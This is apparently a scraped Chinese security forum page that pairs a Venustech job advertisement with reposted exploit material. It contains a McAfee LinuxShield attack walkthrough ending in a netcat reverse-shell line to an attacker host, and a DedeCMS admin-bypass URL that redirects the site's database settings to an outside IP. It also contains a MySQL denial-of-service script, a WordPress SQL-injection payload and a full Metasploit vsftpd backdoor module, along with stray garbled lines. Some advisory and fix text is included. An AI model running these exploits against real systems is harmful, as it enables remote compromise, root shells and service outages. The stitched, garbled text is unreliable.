[Recruitment] [Hiring] Venustech (启明星辰) R&D recruitment

  • Position: Other positions
  • Company name: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Resume email: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: recruit or apply for jobs through Nonsafe China (非安全中国) staff, QQ group: 57116771


  • ++++++++++ Notes about Venustech ++++++++++

    Just send me a private message through the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Proficient with the Linux operating system and with C programming under Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. Responsible for system testing and integration testing of products
    2. Responsible for writing, executing and revising product test cases
    3. Responsible for product performance testing
    4. Responsible for support and testing of external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Solid data communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles and with some firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: LoadRunner, packet analysis software, Spirent or IXIA test equipment

    III. R&D Center: Security Incident Engineer (several openings)

    Responsibilities:

    1. Delivery of Trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar topics
    4. Daily upgrade and maintenance of the security event databases of IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques, the TCP/IP protocol suite and reverse engineering

     


    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine, the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack
    Windows-based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed, a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield web interface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user who can log in to the victim box can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.
    % o' J5 z3 o# D
    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults= _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is 2010.02.18.
    2010.02.16: Vendor response that they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update that they are able to release the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
    Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.


    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause a denial of service.
    1) When a cache backend is used, session handling in django.contrib.sessions has an error that can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store a dictionary-like object in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that validates whether the supplied value is a legitimate URL; if the boolean keyword argument verify_exists is true, it also tries to fetch and resolve the supplied URL. By default the underlying socket has no timeout, so an attacker can send a specially crafted URL that consumes all server memory, causing a denial of service.
    3) When validating URLs supplied to a URLField, redirect responses are handled incorrectly; an attacker can return a redirect to a "file://" URL and thereby determine whether a local file exists on the server.
    4) When generating the full URL of a redirect response, the "X-Forwarded-Host" HTTP header is handled incorrectly; an attacker can exploit this to carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

    Step-by-step guide to installing Linux: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    DedeCMS (织梦) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/<DedeCMS admin directory>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA value and you can enter the site's admin backend directly.

    The precondition for this vulnerability is that the admin backend path must be obtained first.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
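    The fix above recurses because the forbidden name in the PoC URL, cfg_dbhost, is nested two levels below the harmless top-level key _POST: PHP turns a bracketed parameter name like _POST[GLOBALS][cfg_dbhost] into nested arrays, so a loop over only the top-level keys of $_REQUEST never sees it. The following Python model is an added example, not DedeCMS code; it emulates that bracket parsing and runs both the original flat check and the recursive fix over constructed query strings (php_parse_query, flat_check, recursive_check and the placeholder values are names chosen here).

```python
import re
from urllib.parse import unquote_plus

# DedeCMS rejects request variable names that start with cfg_ or GLOBALS
FORBIDDEN = re.compile(r"^(cfg_|GLOBALS)")


def php_parse_query(query):
    """Build nested dicts from a query string the way PHP fills $_GET/$_POST:
    'a=1&b[c][d]=2' -> {'a': '1', 'b': {'c': {'d': '2'}}}.
    Simplified model: no auto-index ([]) support; later keys overwrite."""
    result = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)
        if "[" in name:
            head = name[: name.index("[")]
            keys = [head] + re.findall(r"\[([^\]]*)\]", name[len(head):])
        else:
            keys = [name]
        node = result
        for key in keys[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}  # PHP replaces a scalar with an array here
            node = node[key]
        node[keys[-1]] = value
    return result


def flat_check(request):
    """The original include/common.inc.php loop: only top-level names are
    inspected, so a forbidden name one level down is never examined.
    Returns True when the request would be accepted."""
    for name in request:
        if len(name) > 0 and FORBIDDEN.search(name):
            return False
    return True


def recursive_check(val):
    """The official temporary fix (CheckRequest): walks every key and every
    value at every depth. Returns True when the request would be accepted."""
    if isinstance(val, dict):
        for key, child in val.items():
            if not recursive_check(key) or not recursive_check(child):
                return False
        return True
    return not (len(val) > 0 and FORBIDDEN.search(val))


# Constructed query strings; the database host below is a placeholder
LOGIN_QUERY = "dopost=login&validate=dcug&userid=admin&pwd=inimda"
OVERRIDE_QUERY = (LOGIN_QUERY
                  + "&_POST[GLOBALS][cfg_dbhost]=db.attacker.invalid"
                  + "&_POST[GLOBALS][cfg_dbuser]=root")


def evaluate(query):
    """Return (flat_check accepts, recursive_check accepts) for one query."""
    request = php_parse_query(query)
    return flat_check(request), recursive_check(request)


if __name__ == "__main__":
    for label, query in (("benign login", LOGIN_QUERY),
                         ("cfg_ override", OVERRIDE_QUERY)):
        flat, recursive = evaluate(query)
        print("%-14s flat check accepts: %-5s recursive check accepts: %s"
              % (label, flat, recursive))
```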

    Step-by-step guide to installing Linux: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    MySQL 5.5.8 remote denial of service vulnerability

    import socket, sys

    print ""
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print ""

    # MySQL client handshake response (length 0x26, sequence 1) for user "root"
    # with an empty auth response
    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # COM_QUERY packet (command byte 0x03) carrying the statement as posted
    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent", "[*] Run again to ensure it is down.."
        s.close()

    if __name__ == "__main__":
        main()

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability
    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    5 Y1 q) O% Q0 O( W# R! y6 w% ~) l- s/ i$ ^

    ) j3 z" H/ a* r! }/ Z
    6 S5 y( q. Y, \- }* {6 W& c7 F& r3 U# I4 P9 h# S2 M
    9 i" _( y6 }+ x& \

    - o7 O* ]% O& |% o& K" s3 H( x6 Z7 f9 e- `  C1 ?5 G
    8 n1 x" D$ ^0 j2 N* e9 n
      |! o/ K) U& b

    0 t  \  d: g; ]8 O& S" b! d& r
    ' O: t" l- ?- }/ e7 i% U6 x! V% b" _0 r+ d4 I/ \5 Y6 ~( P$ e7 D

    $ G' E$ v/ P& M" G; u5 m' n* W" H' i1 G
      j; f2 R9 J' t& @: h

    5 r7 C  M5 Y4 H/ W% C- e! j
      _5 `. B8 o: S& d8 C公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    VSFTPD v2.3.4 backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
                'Description'    => %q{
                    This module exploits a malicious backdoor that was added to the VSFTPD download
                    archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
                    June 30th 2011 and July 1st 2011 according to the most recent information
                    available. This backdoor was removed on July 3rd 2011.
                },
                'Author'         => [ 'hdm', 'mc' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: 13099 $',
                'References'     =>
                    [
                        [ 'URL', 'http://pastebin.com/AetT9sS5' ],
                        [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
                    ],
                'Privileged'     => true,
                'Platform'       => [ 'unix' ],
                'Arch'           => ARCH_CMD,
                'Payload'        =>
                    {
                        'Space'       => 2000,
                        'BadChars'    => '',
                        'DisableNops' => true,
                        'Compat'      =>
                            {
                                'PayloadType'    => 'cmd_interact',
                                'ConnectionType' => 'find'
                            }
                    },
                'Targets'        =>
                    [
                        [ 'Automatic', { } ]
                    ],
                'DisclosureDate' => 'Jul 3 2011',
                'DefaultTarget'  => 0))

            register_options([ Opt::RPORT(21) ], self.class)
        end

        def exploit

            # If the backdoor's bind listener is already up, go straight to it
            nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
            if nsock
                print_status("The port used by the backdoor bind listener is already open")
                handle_backdoor(nsock)
                return
            end

            # Connect to the FTP service port first
            connect

            banner = sock.get_once(-1, 30).to_s
            print_status("Banner: #{banner.strip}")

            # The ":)" suffix in the user name is what triggers the backdoor
            sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
            resp = sock.get_once(-1, 30).to_s
            print_status("USER: #{resp.strip}")

            if resp =~ /^530 /
                print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
                disconnect
                return
            end

            if resp !~ /^331 /
                print_error("This server did not respond as expected: #{resp.strip}")
                disconnect
                return
            end

            sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

            # Do not bother reading the response from password, just try the backdoor
            nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
            if nsock
                print_good("Backdoor service has been spawned, handling...")
                handle_backdoor(nsock)
                return
            end

            disconnect

        end

        def handle_backdoor(s)

            # Confirm the listener on 6200 is really a shell before using it
            s.put("id\n")

            r = s.get_once(-1, 5).to_s
            if r !~ /uid=/
                print_error("The service on port 6200 does not appear to be a shell")
                disconnect(s)
                return
            end

            print_good("UID: #{r.strip}")

            s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
            handler(s)
        end

    end